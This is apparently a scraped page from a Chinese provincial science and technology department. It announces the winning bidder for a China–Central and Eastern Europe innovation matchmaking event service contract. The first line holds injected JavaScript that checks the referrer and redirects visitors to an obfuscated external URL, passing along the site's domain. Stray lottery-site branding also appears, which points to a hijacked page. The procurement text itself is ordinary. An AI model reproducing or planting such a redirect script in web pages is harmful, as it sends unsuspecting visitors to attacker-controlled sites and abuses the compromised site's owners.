var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 通知公告

中国—中东欧国家合作国际优秀科技创新项目对接合作专场组织实施服务项目竞争性磋商成交结果公告


发布日期:2021-10-13 08:21来源:科技合作处 阅读次数:

  中国—中东欧国家合作国际优秀科技创新项目对接合作专场组织实施服务项目进行了竞争性磋商,按规定程序进行了开标、评审,现就成交结果公布如下:

  一、项目概况

  项目名称:中国—中东欧国家合作国际优秀科技创新项目对接合作专场组织实施服务项目;

  预算金额:29.53万元;

  采购范围:中国—中东欧国家合作国际优秀科技创新项目对接合作专场的组织实施服务,包括活动方案的整体策划,各环节日程设计,整合国际、国内资源基础沟通、邀请国际、国内嘉宾参与活动,面向中东欧国家进行不少于80个科技创新项目的征集和筛选,提供线上跨境交互平台,会议保障,活动总结等工作等。

  二、公告发布媒体及时间

  本项目竞争性磋商公告于2021年9月22日在《河南省科技厅官网》上发布。

  三、磋商信息

  磋商日期:2021年10月11日15时00分(北京时间)

  磋商地点:郑州市金水区花园路27号科技信息大厦2号楼7楼会议室

  磋商小组成员:郑飞、王延峰、胡俊华

  四、成交信息:

  成交单位名称:国智汇融(北京)国际技术有限公司

  成交金额:295000.00元

  服务期限:2021年10月21至2021年10月24日

  五、其他事项

  公示期限1个工作日,各参与磋商的磋商供应商对磋商结果有异议的,可以以书面形式向采购人提出质疑(加盖单位公章且法定代表人签字,并附带相应的证明材料),由法定代表人或其授权代表携带企业营业执照复印件(加盖公章)及本人身份证件(原件)一并提交(邮寄、邮件不予受理),并以质疑函接受确认日期作为受理时间。逾期未提交或未按照要求提交的质疑函将不予受理。

  联系方式:

  科技合作处 0371-63681823

  机关纪委 0371-86561631

中国竞彩网

2021年10月13日